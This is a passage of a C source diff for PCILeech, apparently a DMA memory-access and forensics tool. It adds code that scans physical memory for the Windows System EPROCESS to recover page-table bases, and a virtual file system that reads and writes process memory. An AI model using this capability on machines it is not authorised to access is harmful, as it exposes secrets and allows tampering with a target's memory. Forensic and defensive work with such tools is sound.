+                    pSystemProcess = VmmProcessCreateEntry(ctxVmm, 4, 0, paSystemPML4, "System", FALSE, TRUE);
+                    VmmProcessCreateFinish(ctxVmm);
+                    pSystemProcess->os.win.vaEPROCESS = vaSystemEPROCESS;
+                    VmmProcWindows_EnumerateEPROCESS(ctxVmm, pSystemProcess);
+                    if(ctxVmm->ctxPcileech->cfg->fVerboseExtra) {
+                        printf("VmmProc: vmmproc.c!VmmProcCacheUpdaterThread FlushProcessListAndBuffers\n");
+                    }
+                }
+            }
+            // Single user-defined X64 process
+            if(ctxVmm->fUnknownX64) {
+                VmmProcessCreateTable(ctxVmm);
+                VmmProcUserCR3TryInitialize(ctxVmm);
+            }
+        }
+        LeaveCriticalSection(&ctxVmm->MasterLock);
+    }
+    if(ctxVmm->ctxPcileech->cfg->fVerbose) {
+        printf("VmmProc: Exit periodic cache flushing.\n");
+    }
+    ctxVmm->ThreadProcCache.hThread = NULL;
+    return 0;
+}
+
+VmmProc_InitializeModuleNames(_Inout_ PVMM_CONTEXT ctxVmm, _In_ PVMM_PROCESS pProcess)
+{
+    if(ctxVmm->fWin) {
+        VmmProcWindows_InitializeLdrModules(ctxVmm, pProcess);
+        VmmProcWindows_ScanHeaderPE(ctxVmm, pProcess);
+    }
+}
+
+BOOL VmmProcInitialize(_Inout_ PPCILEECH_CONTEXT ctx)
+{
+    BOOL result;
+    QWORD vaKernelBase;
+    PVMM_CONTEXT ctxVmm;
+    if(!VmmInitialize(ctx)) { return FALSE; }
+    // user supplied a CR3 - use it!
+    if(ctx->cfg->qwCR3) {
+        // if VmmProcPHYS_ScanWindowsKernel_LargePages returns a value this is a
+        // Windows system - initialize it, otherwise initialize the generic x64
+        // single process more basic mode.
+        result = FALSE;
+        vaKernelBase = VmmProcPHYS_ScanWindowsKernel_LargePages((PVMM_CONTEXT)ctx->hVMM, ctx->cfg->qwCR3);
+        if(vaKernelBase) {
+            result = VmmProcWindows_TryInitialize(ctx, ctx->cfg->qwCR3, vaKernelBase);
+        }
+        if(!vaKernelBase) {
+            result = VmmProcUserCR3TryInitialize((PVMM_CONTEXT)ctx->hVMM);
+            if(!result) {
+                VmmInitialize(ctx); // re-initialize VMM to clear state
+            }
+        }
+        if(!result) {
+            result = VmmProcUserCR3TryInitialize((PVMM_CONTEXT)ctx->hVMM);
+        }
+    } else {
+        // no page directory was found, so try initialize it by looking if the
+        // "low stub" exists on a Windows sytem and use it. Otherwise fail.
+        result = VmmProcWindows_TryInitialize(ctx, 0, 0);
+        if(!result) {
+            printf(
+                "VmmProc: Unable to auto-identify operating system for PROC file system mount.   \n" \
+                "         Please specify PageDirectoryBase (CR3/PML4) in the -cr3 option if value\n" \
+                "         is known. If unknown it may be recoverable with command 'identify'.    \n");
+        }
+    }
+    // set up cache mainenance in the form of a separate worker thread in case
+    // the backend is a writeable device (FPGA). File devices are read-only so
+    // far so full caching is enabled since they are considered to be read-only.
+    ctxVmm = (PVMM_CONTEXT)ctx->hVMM;
+    if(result && !ctxVmm->fReadOnly) {
+        ctxVmm->ThreadProcCache.fEnabled = TRUE;
+        ctxVmm->ThreadProcCache.hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)VmmProcCacheUpdaterThread, ctxVmm, 0, NULL);
+        if(!ctxVmm->ThreadProcCache.hThread) { ctxVmm->ThreadProcCache.fEnabled = FALSE; }
+    }
+    return result;
+}
+
+// ----------------------------------------------------------------------------
+// SCAN/SEARCH TO IDENTIFY IMAGE:
+// - Currently Windows PageDirectoryBase/CR3/PML4 detection is supported only
+// ----------------------------------------------------------------------------
+
+_Success_(return)
+BOOL VmmProcPHYS_VerifyWindowsEPROCESS(_Inout_ PPCILEECH_CONTEXT ctx, _In_ PBYTE pb, _In_ QWORD cb, _In_ QWORD cbOffset, _Out_ PQWORD ppaPML4)
+{
+    QWORD i;
+    if(cb < cbOffset + 8) { return FALSE; }
+    if((cb & 0x07) || (cb < 0x500) || (cbOffset < 0x500)) { return FALSE; }
+    if(*(PQWORD)(pb + cbOffset) != 0x00006D6574737953) { return FALSE; }        // not matching System00
+    if(*(PQWORD)(pb + cbOffset + 8) & 0x00ffffffffffffff) { return FALSE; }     // not matching 0000000
+    // maybe we have EPROCESS struct here, scan back to see if we can find
+    // 4 kernel addresses in a row and a potential PML4 after that and zero
+    // DWORD before that. (EPROCESS HDR).
+    for(i = cbOffset; i > cbOffset - 0x500; i -= 8) {
+        if((*(PQWORD)(pb + i - 0x00) & 0xfffff00000000000)) { continue; };                          // DirectoryTableBase
+        if(!*(PQWORD)(pb + i - 0x00)) { continue; };                                                // DirectoryTableBase
+        if((*(PQWORD)(pb + i - 0x08) & 0xffff800000000000) != 0xffff800000000000) { continue; };    // PTR
+        if((*(PQWORD)(pb + i - 0x10) & 0xffff800000000000) != 0xffff800000000000) { continue; };    // PTR
+        if((*(PQWORD)(pb + i - 0x18) & 0xffff800000000000) != 0xffff800000000000) { continue; };    // PTR
+        if((*(PQWORD)(pb + i - 0x20) & 0xffff800000000000) != 0xffff800000000000) { continue; };    // PTR
+        if((*(PDWORD)(pb + i - 0x24) != 0x00000000)) { continue; };                                 // SignalState
+        *ppaPML4 = *(PQWORD)(pb + i - 0x00);
+        return TRUE;
+    }
+    return FALSE;
+}
+
+_Success_(return)
+BOOL VmmProcPHYS_ScanForKernel(_Inout_ PPCILEECH_CONTEXT ctx, _Out_ PQWORD ppaPML4)
+{
+    QWORD o, i, paMax, paCurrent;
+    PAGE_STATISTICS pageStat;
+    PBYTE pbBuffer8M;
+    BOOL result;
+    // initialize / allocate memory
+    if(!(pbBuffer8M = LocalAlloc(0, 0x800000))) { return FALSE; }
+    ZeroMemory(&pageStat, sizeof(PAGE_STATISTICS));
+    paMax = min(ctx->cfg->qwAddrMax, ctx->cfg->dev.qwAddrMaxNative);
+    paCurrent = max(0x100000, ctx->cfg->qwAddrMin);
+    PageStatInitialize(&pageStat, paCurrent, paMax, "Scanning to identify ...", FALSE, FALSE);
+    // loop kmd-find
+    for(; paCurrent < paMax; paCurrent += 0x00800000) {
+        if(!DeviceReadDMAEx(ctx, paCurrent, pbBuffer8M, 0x00800000, &pageStat, 0)) { continue; }
+        for(o = 0; o < 0x00800000; o += 0x1000) {
+            // Scan for windows EPROCESS (to get DirectoryBase/PML4)
+            for(i = 0; i < 0x1000; i += 8) {
+                if(*(PQWORD)(pbBuffer8M + o + i) == 0x00006D6574737953) {
+                    result = VmmProcPHYS_VerifyWindowsEPROCESS(ctx, pbBuffer8M, 0x00800000, o + i, ppaPML4);
+                    if(result) {
+                        pageStat.szAction = "Windows System PageDirectoryBase/PML4 located";
+                        LocalFree(pbBuffer8M);
+                        PageStatClose(&pageStat);
+                        return TRUE;
+                    }
+                }
+            }
+        }
+    }
+    LocalFree(pbBuffer8M);
+    pageStat.szAction = "Scanning to identify ... FAILED!";
+    PageStatClose(&pageStat);
+    *ppaPML4 = 0;
+    return FALSE;
+}
+
+VOID ActionIdentify(_Inout_ PPCILEECH_CONTEXT ctx)
+{
+    BOOL result;
+    QWORD paPML4;
+    printf(
+        "IDENTIFY: Scanning to identify target operating system and page directories...\n"
+        "  Currently supported oprerating systems:\n"
+        "     - Windows (64-bit).\n");
+    result = VmmProcPHYS_ScanForKernel(ctx, &paPML4);
+    if(result) {
+        printf("IDENTIFY: Succeeded: Windows System page directory base is located at: 0x%llx\n", paPML4);
+    } else {
+        printf("IDENTIFY: Failed. No fully supported operating system detected.\n");
+    }
+}
+
+#endif /* WIN32 */
+#if defined(LINUX) || defined(ANDROID)
+
+#include "vmmproc.h"
+
+VOID ActionIdentify(_Inout_ PPCILEECH_CONTEXT ctx)
+{
+    printf("IDENTIFY; Functionality currently only supported in PCILeech for WIndows.\n");
+}
+
+#endif /* LINUX || ANDROID */
diff --git a/pcileech/vmmproc.h b/pcileech/vmmproc.h
new file mode 100644
index 0000000..21372c7
--- /dev/null
+++ b/pcileech/vmmproc.h
@@ -0,0 +1,38 @@
+// vmmproc.h : definitions related to operating system and process parsing of virtual memory
+//
+// (c) Ulf Frisk, 2018
+// Author: Ulf Frisk, pcileech@frizk.net
+//
+#ifndef __VMMPROC_H__
+#define __VMMPROC_H__
+#include "pcileech.h"
+#include "vmm.h"
+
+#ifdef WIN32
+
+/*
+* Load operating system dependant module names, such as parsed from PE or ELF
+* into the proper display caches, and also into the memory map.
+*/
+VmmProc_InitializeModuleNames(_Inout_ PVMM_CONTEXT ctxVmm, _In_ PVMM_PROCESS pProcess);
+
+/*
+* Tries to automatically identify the operating system given by the supplied
+* memory device (fpga hardware or file). If an operating system is successfully
+* identified a VMM_CONTEXT will be created and stored within the PCILEECH_CONTEXT.
+* If the VMM fails to identify an operating system FALSE is returned.
+* -- ctx
+* -- return
+*/
+BOOL VmmProcInitialize(_Inout_ PPCILEECH_CONTEXT ctx);
+
+#endif /* WIN32 */
+
+/*
+* Scans the memory for supported operating system structures, such as Windows
+* page directory bases and reports them if found.
+* -- ctx
+*/
+VOID ActionIdentify(_Inout_ PPCILEECH_CONTEXT ctx);
+
+#endif /* __VMMPROC_H__ */
diff --git a/pcileech/vmmvfs.c b/pcileech/vmmvfs.c
new file mode 100644
index 0000000..3047487
--- /dev/null
+++ b/pcileech/vmmvfs.c
@@ -0,0 +1,334 @@
+// vmmvfs.c : implementation related to virtual memory management / virtual file system interfacing.
+//
+// (c) Ulf Frisk, 2018
+// Author: Ulf Frisk, pcileech@frizk.net
+//
+#include "vmmvfs.h"
+#include "vmm.h"
+#include "vmmproc.h"
+#include "vfs.h"
+#include "util.h"
+
+#define STATUS_SUCCESS                   ((NTSTATUS)0x00000000L)    // ntsubauth
+#define STATUS_END_OF_FILE               ((NTSTATUS)0xC0000011L)
+#define STATUS_FILE_INVALID              ((NTSTATUS)0xC0000098L)
+
+NTSTATUS VmmVfsReadFile_FromBuffer(_In_ PBYTE pbFile, _In_ QWORD cbFile, _Out_ LPVOID pb, _In_ DWORD cb, _Out_ PDWORD pcbRead, _In_ QWORD cbOffset)
+{
+    if(cbOffset > cbFile) { return STATUS_END_OF_FILE; }
+    *pcbRead = (DWORD)min(cb, cbFile - cbOffset);
+    memcpy(pb, pbFile + cbOffset, *pcbRead);
+    return *pcbRead ? STATUS_SUCCESS : STATUS_END_OF_FILE;
+}
+
+NTSTATUS VmmVfsReadFile_FromQWORD(_In_ QWORD qwValue, _Out_ LPVOID pb, _In_ DWORD cb, _Out_ PDWORD pcbRead, _In_ QWORD cbOffset)
+{
+    BYTE pbBuffer[32];
+    DWORD cbBuffer;
+    cbBuffer = snprintf(pbBuffer, 32, "0x%016llx", qwValue);
+    return VmmVfsReadFile_FromBuffer(pbBuffer, cbBuffer, pb, cb, pcbRead, cbOffset);
+}
+
+NTSTATUS VmmVfsReadFileDo(_Inout_ PPCILEECH_CONTEXT ctx, _In_opt_ DWORD dwPID, _In_opt_ LPWSTR wszPath1, _In_opt_ QWORD qwPath2, _Out_ LPVOID pb, _In_ DWORD cb, _Out_ PDWORD pcbRead, _In_ QWORD cbOffset)
+{
+    PVMM_CONTEXT ctxVmm = (PVMM_CONTEXT)ctx->hVMM;
+    PVMM_MEMMAP_ENTRY pMapEntry;
+    PVMM_PROCESS pProcess;
+    BYTE pbBuffer[48];
+    DWORD cbBuffer;
+    QWORD cbMax;
+    ZeroMemory(pbBuffer, 48);
+    if(!ctxVmm) { return STATUS_FILE_INVALID; }
+    pProcess = VmmProcessGet(ctxVmm, dwPID);
+    if(!pProcess) { return STATUS_FILE_INVALID; }
+    // read memory from "vmem" file
+    if(!_wcsicmp(wszPath1, L"vmem")) {
+        VmmReadEx(ctxVmm, pProcess, cbOffset, pb, cb, NULL);
+        *pcbRead = cb;
+        return STATUS_SUCCESS;
+    }
+    // read memory from "vmemd" directory file
+    if(!_wcsicmp(wszPath1, L"vmemd")) {
+        pMapEntry = VmmMapGetEntry(pProcess, qwPath2);
+        if(!pMapEntry) { return STATUS_FILE_INVALID; }
+        if(qwPath2 & 0xfff) { return STATUS_FILE_INVALID; }
+        *pcbRead = 0;
+        if(pMapEntry->AddrBase + (pMapEntry->cPages << 12) <= qwPath2 + cbOffset) { return STATUS_END_OF_FILE; }
+        cbMax = min((pMapEntry->AddrBase + (pMapEntry->cPages << 12)), (qwPath2 + cb + cbOffset)) - (qwPath2 - cbOffset);   // min(entry_top_addr, request_top_addr) - request_start_addr
+        VmmReadEx(ctxVmm, pProcess, qwPath2 + cbOffset, pb, (DWORD)min(cb, cbMax), pcbRead);
+        return (*pcbRead) ? STATUS_SUCCESS : STATUS_END_OF_FILE;
+    }
+    // read the memory map
+    if(!_wcsicmp(wszPath1, L"map")) {
+        if(!pProcess->pbMemMapDisplayCache) {
+            VmmMapDisplayBufferGenerate(pProcess);
+            if(!pProcess->pbMemMapDisplayCache) {
+                return STATUS_FILE_INVALID;
+            }
+        }
+        return VmmVfsReadFile_FromBuffer(pProcess->pbMemMapDisplayCache, pProcess->cbMemMapDisplayCache, pb, cb, pcbRead, cbOffset);
+    }
+    // read genereal numeric values from files, pml4, pid, name, virt, virt2phys
+    if(!_wcsicmp(wszPath1, L"pml4")) {
+        return VmmVfsReadFile_FromQWORD(pProcess->paPML4, pb, cb, pcbRead, cbOffset);
+    }
+    if(!_wcsicmp(wszPath1, L"pid")) {
+        cbBuffer = snprintf(pbBuffer, 32, "%i", pProcess->dwPID);
+        return VmmVfsReadFile_FromBuffer(pbBuffer, cbBuffer, pb, cb, pcbRead, cbOffset);
+    }
+    if(!_wcsicmp(wszPath1, L"name")) {
+        cbBuffer = snprintf(pbBuffer, 32, "%s", pProcess->szName);
+        return VmmVfsReadFile_FromBuffer(pbBuffer, cbBuffer, pb, cb, pcbRead, cbOffset);
+    }
+    if(!_wcsicmp(wszPath1, L"virt2phys")) {
+        cbBuffer = snprintf(pbBuffer, 48, "0x%016llx 0x%016llx", pProcess->Virt2Phys_VA, pProcess->Virt2Phys_PA);
+        return VmmVfsReadFile_FromBuffer(pbBuffer, cbBuffer, pb, cb, pcbRead, cbOffset);
+    }
+    // windows specific reads below:
+    if(ctxVmm->fWin) {
+        if(!_wcsicmp(wszPath1, L"win-eprocess")) {
+            return VmmVfsReadFile_FromQWORD(pProcess->os.win.vaEPROCESS, pb, cb, pcbRead, cbOffset);
+        }
+        if(!_wcsicmp(wszPath1, L"win-peb")) {
+            return VmmVfsReadFile_FromQWORD(pProcess->os.win.vaPEB, pb, cb, pcbRead, cbOffset);
+        }
+        if(!_wcsicmp(wszPath1, L"win-entry")) {
+            return VmmVfsReadFile_FromQWORD(pProcess->os.win.vaENTRY, pb, cb, pcbRead, cbOffset);
+        }
+        if(!_wcsicmp(wszPath1, L"win-modules") && pProcess->os.win.pbLdrModulesDisplayCache) {
+            return VmmVfsReadFile_FromBuffer(pProcess->os.win.pbLdrModulesDisplayCache, pProcess->os.win.cbLdrModulesDisplayCache, pb, cb, pcbRead, cbOffset);
+        }
+    }
+    return STATUS_FILE_INVALID;
+}
+
+NTSTATUS VmmVfsReadFile(_Inout_ PPCILEECH_CONTEXT ctx, _In_opt_ DWORD dwPID, _In_opt_ LPWSTR wszPath1, _In_opt_ QWORD qwPath2, _Out_ LPVOID pb, _In_ DWORD cb, _Out_ PDWORD pcbRead, _In_ QWORD cbOffset)
+{
+    NTSTATUS nt;
+    PVMM_CONTEXT ctxVmm = (PVMM_CONTEXT)ctx->hVMM;
+    EnterCriticalSection(&ctxVmm->MasterLock);
+    nt = VmmVfsReadFileDo(ctx, dwPID, wszPath1, qwPath2, pb, cb, pcbRead, cbOffset);
+    LeaveCriticalSection(&ctxVmm->MasterLock);
+    return nt;
+}
+
+
+NTSTATUS VmmVfsWriteFile_Virt2Phys(PVMM_CONTEXT ctxVmm, _In_ PVMM_PROCESS pProcess, _Out_ LPVOID pb, _In_ DWORD cb, _Out_ PDWORD pcbWrite, _In_ QWORD cbOffset)
+{
+    BYTE pbBuffer[48];
+    if(cbOffset < 18) {
+        *pcbWrite = cb;
+        snprintf(pbBuffer, 48, "0x%016llx 0x%016llx", pProcess->Virt2Phys_VA, pProcess->Virt2Phys_PA);
+        cb = (DWORD)min(18 - cbOffset, cb);
+        memcpy(pbBuffer + cbOffset, pb, cb);
+        pbBuffer[18] = 0;
+        pProcess->Virt2Phys_VA = Util_GetNumeric((LPSTR)pbBuffer);
+        VmmVirt2Phys(ctxVmm, pProcess, pProcess->Virt2Phys_VA, &pProcess->Virt2Phys_PA);
+    } else {
+        *pcbWrite = 0;
+    }
+    return STATUS_SUCCESS;
+}
+
+NTSTATUS VmmVfsWriteFileDo(_Inout_ PPCILEECH_CONTEXT ctx, _In_opt_ DWORD dwPID, _In_opt_ LPWSTR wszPath1, _In_opt_ QWORD qwPath2, _Out_ LPVOID pb, _In_ DWORD cb, _Out_ PDWORD pcbWrite, _In_ QWORD cbOffset)
+{
+    PVMM_CONTEXT ctxVmm = (PVMM_CONTEXT)ctx->hVMM;
+    PVMM_MEMMAP_ENTRY pMapEntry;
+    PVMM_PROCESS pProcess;
+    BOOL fFound, result;
+    QWORD cbMax;
+    if(!wszPath1) { return STATUS_FILE_INVALID; }
+    pProcess = VmmProcessGet(ctxVmm, dwPID);
+    if(!pProcess) { return STATUS_FILE_INVALID; }
+    // read only files - report zero bytes written
+    fFound =
+        !_wcsicmp(wszPath1, L"map") ||
+        !_wcsicmp(wszPath1, L"pml4") ||
+        !_wcsicmp(wszPath1, L"pid") ||
+        !_wcsicmp(wszPath1, L"name") ||
+        (!_wcsicmp(wszPath1, L"vmemd") && (qwPath2 == (QWORD)-1));
+    if(fFound) {
+        *pcbWrite = 0;
+        return STATUS_SUCCESS;
+    }
+    // windows specific writes below:
+    if(ctxVmm->fWin) {
+        fFound =
+            !_wcsicmp(wszPath1, L"win-eprocess") ||
+            !_wcsicmp(wszPath1, L"win-peb") ||
+            !_wcsicmp(wszPath1, L"win-entry") ||
+            !_wcsicmp(wszPath1, L"win-modules");
+        if(fFound) {
+            *pcbWrite = 0;
+            return STATUS_SUCCESS;
+        }
+    }
+    // write: virt file
+    if(!_wcsicmp(wszPath1, L"virt2phys")) {
+        return VmmVfsWriteFile_Virt2Phys(ctxVmm, pProcess, pb, cb, pcbWrite, cbOffset);
+    }
+    // write memory to "vmem" file
+    if(!_wcsicmp(wszPath1, L"vmem")) {
+        result = VmmWrite(ctxVmm, pProcess, cbOffset, pb, cb);
+        *pcbWrite = cb;
+        return STATUS_SUCCESS;
+    }
+    // write memory from "vmemd" directory file
+    if(!_wcsicmp(wszPath1, L"vmemd")) {
+        pMapEntry = VmmMapGetEntry(pProcess, qwPath2);
+        if(!pMapEntry) { return STATUS_FILE_INVALID; }
+        if(qwPath2 & 0xfff) { return STATUS_FILE_INVALID; }
+        *pcbWrite = 0;
+        if(pMapEntry->AddrBase + (pMapEntry->cPages << 12) <= qwPath2 + cbOffset) { return STATUS_END_OF_FILE; }
+        cbMax = min((pMapEntry->AddrBase + (pMapEntry->cPages << 12)), (qwPath2 + cb + cbOffset)) - (qwPath2 - cbOffset);   // min(entry_top_addr, request_top_addr) - request_start_addr
+        VmmWrite(ctxVmm, pProcess, qwPath2 + cbOffset, pb, (DWORD)min(cb, cbMax));
+        *pcbWrite = cb;
+        return STATUS_SUCCESS;
+    }
+    return STATUS_FILE_INVALID;
+}
+
+NTSTATUS VmmVfsWriteFile(_Inout_ PPCILEECH_CONTEXT ctx, _In_opt_ DWORD dwPID, _In_opt_ LPWSTR wszPath1, _In_opt_ QWORD qwPath2, _Out_ LPVOID pb, _In_ DWORD cb, _Out_ PDWORD pcbWrite, _In_ QWORD cbOffset)
+{
+    NTSTATUS nt;
+    PVMM_CONTEXT ctxVmm = (PVMM_CONTEXT)ctx->hVMM;
+    EnterCriticalSection(&ctxVmm->MasterLock);
+    nt = VmmVfsWriteFileDo(ctx, dwPID, wszPath1, qwPath2, pb, cb, pcbWrite, cbOffset);
+    LeaveCriticalSection(&ctxVmm->MasterLock);
+    return nt;
+}
+
+VOID VmmVfsListFiles_PopulateResultFileInfo(_Inout_ PVFS_RESULT_FILEINFO pfi, _In_ LPSTR szName, _In_ QWORD cb, _In_ QWORD flags)
+{
+    DWORD i = 0;
+    while(i < MAX_PATH && szName[i]) {
+        pfi->wszFileName[i] = szName[i];
+        i++;
+    }
+    pfi->wszFileName[i] = 0;
+    pfi->flags = flags;
+    pfi->cb = cb;
+}
+
+VOID VmmVfsListFiles_OsSpecific(_Inout_ PVMM_CONTEXT ctxVmm, _In_ PVMM_PROCESS pProcess, _Inout_ PVFS_RESULT_FILEINFO *ppfi, _Inout_ PQWORD pcfi, _In_ QWORD cfiMax)
+{
+    // WINDOWS
+    if(ctxVmm->fWin) {
+        if(*pcfi >= cfiMax) { return; }
+        VmmVfsListFiles_PopulateResultFileInfo(*ppfi + *pcfi, "win-eprocess", 18, VFS_FLAGS_FILE_NORMAL);
+        *pcfi = *pcfi + 1;
+        if(*pcfi >= cfiMax) { return; }
+        VmmVfsListFiles_PopulateResultFileInfo(*ppfi + *pcfi, "win-peb", 18, VFS_FLAGS_FILE_NORMAL);
+        *pcfi = *pcfi + 1;
+        if(*pcfi >= cfiMax) { return; }
+        if(pProcess->os.win.vaENTRY) {
+            VmmVfsListFiles_PopulateResultFileInfo(*ppfi + *pcfi, "win-entry", 18, VFS_FLAGS_FILE_NORMAL);
+            *pcfi = *pcfi + 1;
+            if(*pcfi >= cfiMax) { return; }
+        }
+        if(pProcess->os.win.cbLdrModulesDisplayCache) {
+            VmmVfsListFiles_PopulateResultFileInfo(*ppfi + *pcfi, "win-modules", pProcess->os.win.cbLdrModulesDisplayCache, VFS_FLAGS_FILE_NORMAL);
+            *pcfi = *pcfi + 1;
+            if(*pcfi >= cfiMax) { return; }
+        }
+    }
+}
+
+_Success_(return)
+BOOL VmmVfsListFilesDo(_Inout_ PPCILEECH_CONTEXT ctx, _In_ BOOL fRoot, _In_ BOOL fNamesPid, _In_opt_ DWORD dwPID, _In_opt_ LPWSTR wszPath1, _In_opt_ QWORD qwPath2, _Out_ PVFS_RESULT_FILEINFO *ppfi, _Out_ PQWORD pcfi)
+{
+    PVMM_CONTEXT ctxVmm = (PVMM_CONTEXT)ctx->hVMM;
+    PVFS_RESULT_FILEINFO pfi;
+    PVMM_PROCESS pProcess;
+    WORD iProcess;
+    DWORD i, cMax;
+    if(!ctxVmm) { return FALSE; }
+    // populate root node - list processes as directories
+    if(fRoot) {
+        *ppfi = LocalAlloc(LMEM_ZEROINIT, ctxVmm->ptPROC->c * sizeof(VFS_RESULT_FILEINFO));
+        if(!*ppfi) { return FALSE; }
+        *pcfi = 0;
+        iProcess = ctxVmm->ptPROC->iFLink;
+        pProcess = ctxVmm->ptPROC->M[iProcess];
+        while(pProcess) {
+            {
+                pfi = *ppfi + *pcfi;
+                if(fNamesPid) {
+                    if(pProcess->dwState) {
+                        swprintf(pfi->wszFileName, MAX_PATH - 1, L"%S-(%x)-%i", pProcess->szName, pProcess->dwState, pProcess->dwPID);
+                    } else {
+                        swprintf(pfi->wszFileName, MAX_PATH - 1, L"%S-%i", pProcess->szName, pProcess->dwPID);
+                    }
+                } else {
+                    swprintf(pfi->wszFileName, MAX_PATH - 1, L"%i", pProcess->dwPID);
+                }
+                pfi->flags = VFS_FLAGS_FILE_DIRECTORY;
+                *pcfi = *pcfi + 1;
+            }
+            iProcess = ctxVmm->ptPROC->iFLinkM[iProcess];
+            pProcess = ctxVmm->ptPROC->M[iProcess];
+            if(!iProcess || iProcess == ctxVmm->ptPROC->iFLink) { break; }
+        }
+        return TRUE;
+    }
+    // generate memmap, if not already done. required by following steps
+    pProcess = VmmProcessGet(ctxVmm, dwPID);
+    if(!pProcess) { return FALSE; }
+    if(!pProcess->pMemMap || !pProcess->cMemMap) {
+        if(!pProcess->fSpiderPageTableDone) {
+            VmmTlbSpider(ctxVmm, 0, pProcess->fUserOnly);
+            pProcess->fSpiderPageTableDone = TRUE;
+        }
+        VmmMapInitialize(ctxVmm, pProcess);
+        VmmProc_InitializeModuleNames(ctxVmm, pProcess);
+        VmmMapDisplayBufferGenerate(pProcess);
+    }
+    // populate process directory - list standard files and memd subdirectory
+    if(!wszPath1) {
+        cMax = 12;
+        *pcfi = 7;
+        *ppfi = LocalAlloc(LMEM_ZEROINIT, cMax * sizeof(VFS_RESULT_FILEINFO));
+        if(!*ppfi) { return FALSE; }
+        VmmVfsListFiles_PopulateResultFileInfo(*ppfi + 0, "map", pProcess->cbMemMapDisplayCache, VFS_FLAGS_FILE_NORMAL);
+        VmmVfsListFiles_PopulateResultFileInfo(*ppfi + 1, "vmem", 0x0001000000000000, VFS_FLAGS_FILE_NORMAL);
+        VmmVfsListFiles_PopulateResultFileInfo(*ppfi + 2, "vmemd", 0, VFS_FLAGS_FILE_DIRECTORY);
+        VmmVfsListFiles_PopulateResultFileInfo(*ppfi + 3, "name", 16, VFS_FLAGS_FILE_NORMAL);
+        VmmVfsListFiles_PopulateResultFileInfo(*ppfi + 4, "pid", 10, VFS_FLAGS_FILE_NORMAL);
+        VmmVfsListFiles_PopulateResultFileInfo(*ppfi + 5, "pml4", 18, VFS_FLAGS_FILE_NORMAL);
+        VmmVfsListFiles_PopulateResultFileInfo(*ppfi + 6, "virt2phys", 37, VFS_FLAGS_FILE_NORMAL);
+        VmmVfsListFiles_OsSpecific(ctxVmm, pProcess, ppfi, pcfi, cMax);
+        return TRUE;
+    }
+    // populate memory map directory
+    if(!_wcsicmp(wszPath1, L"vmemd") && pProcess->pMemMap) {
+        *pcfi = pProcess->cMemMap;
+        *ppfi = LocalAlloc(LMEM_ZEROINIT, pProcess->cMemMap * sizeof(VFS_RESULT_FILEINFO));
+        if(pProcess->cMemMap > 0) {
+            if(!*ppfi) { return FALSE; }
+            for(i = 0; i < pProcess->cMemMap; i++) {
+                pfi = *ppfi + i;
+                swprintf(
+                    pfi->wszFileName,
+                    MAX_PATH - 1,
+                    L"0x%016llx%s%S.vmem",
+                    pProcess->pMemMap[i].AddrBase,
+                    pProcess->pMemMap[i].szName[0] ? L"-" : L"",
+                    pProcess->pMemMap[i].szName[0] ? pProcess->pMemMap[i].szName : "");
+                pfi->cb = pProcess->pMemMap[i].cPages << 12;
+                pfi->flags = VFS_FLAGS_FILE_NORMAL;
+            }
+        }
+        return TRUE;
+    }
+    return FALSE;
+}
+
+BOOL VmmVfsListFiles(_Inout_ PPCILEECH_CONTEXT ctx, _In_ BOOL fRoot, _In_ BOOL fNamesPid, _In_opt_ DWORD dwPID, _In_opt_ LPWSTR wszPath1, _In_opt_ QWORD qwPath2, _Out_ PVFS_RESULT_FILEINFO *ppfi, _Out_ PQWORD pcfi)
+{
+    BOOL result;
+    PVMM_CONTEXT ctxVmm = (PVMM_CONTEXT)ctx->hVMM;
+    EnterCriticalSection(&ctxVmm->MasterLock);
+    result = VmmVfsListFilesDo(ctx, fRoot, fNamesPid, dwPID, wszPath1, qwPath2, ppfi, pcfi);
+    LeaveCriticalSection(&ctxVmm->MasterLock);
+    return result;
+}
diff --git a/pcileech/vmmvfs.h b/pcileech/vmmvfs.h
new file mode 100644
index 0000000..6801332
--- /dev/null
+++ b/pcileech/vmmvfs.h
@@ -0,0 +1,57 @@
+// vmmvfs.h : definitions related to virtual memory management / virtual file system interfacing.
+//
+// (c) Ulf Frisk, 2018
+// Author: Ulf Frisk, pcileech@frizk.net
+//
+#ifndef __VMMVFS_H__
+#define __VMMVFS_H__
+#ifdef WIN32
+#include "pcileech.h"
+#include "vfs.h"
+
+/*
+* Allocate and populate the ppfi struct with "proc" data about directories and
+* files.
+* NB! The caller must LocalFree the ppfi struct which is allocated by this fn.
+* -- ctx
+* -- fRoot      = is root directory (PID list should end up here)
+* -- fNamesPid  = type of PID list that should be outputted if fRoot is set
+* -- dwPID
+* -- wszPath1   = sub directory under PID directory (if any)
+* -- qwPath2    = address file (if any)
+* -- ppfi       = output buffer
+* -- pcfi       = count output buffer
+* -- return
+*/
+BOOL VmmVfsListFiles(_Inout_ PPCILEECH_CONTEXT ctx, _In_ BOOL fRoot, _In_ BOOL fNamesPid, _In_opt_ DWORD dwPID, _In_opt_ LPWSTR wszPath1, _In_opt_ QWORD qwPath2, _Out_ PVFS_RESULT_FILEINFO *ppfi, _Out_ PQWORD pcfi);
+
+/*
+* Read the contents of a file into the caller supplied buffer. This file may be
+* a memory file or any other file in the "proc" virtual file system.
+* -- ctx
+* -- dwPID
+* -- wszPath1   = sub directory under PID directory (if any)
+* -- qwPath2    = address file (if any)
+* -- pb         = buffer
+* -- cb         = bytes to read/size of pb
+* -- pcbRead    = bytes actually read
+* -- cbOffset   = offset where to start read compared to file start
+*/
+NTSTATUS VmmVfsReadFile(_Inout_ PPCILEECH_CONTEXT ctx, _In_opt_ DWORD dwPID, _In_opt_ LPWSTR wszPath1, _In_opt_ QWORD qwPath2, _Out_ LPVOID pb, _In_ DWORD cb, _Out_ PDWORD pcbRead, _In_ QWORD cbOffset);
+
+/*
+* Write the contents of a file into the caller supplied buffer. This file may be
+* a memory file or any other file in the "proc" virtual file system.
+* -- ctx
+* -- dwPID
+* -- wszPath1   = sub directory under PID directory (if any)
+* -- qwPath2    = address file (if any)
+* -- pb         = buffer
+* -- cb         = bytes to read/size of pb
+* -- pcbWrite   = bytes actually read
+* -- cbOffset   = offset where to start read compared to file start
+*/
+NTSTATUS VmmVfsWriteFile(_Inout_ PPCILEECH_CONTEXT ctx, _In_opt_ DWORD dwPID, _In_opt_ LPWSTR wszPath1, _In_opt_ QWORD qwPath2, _Out_ LPVOID pb, _In_ DWORD cb, _Out_ PDWORD pcbWrite, _In_ QWORD cbOffset);
+
+#endif /* WIN32 */
+#endif /* __VMMVFS_H__ */
diff --git a/pcileech_files/pcileech b/pcileech_files/pcileech
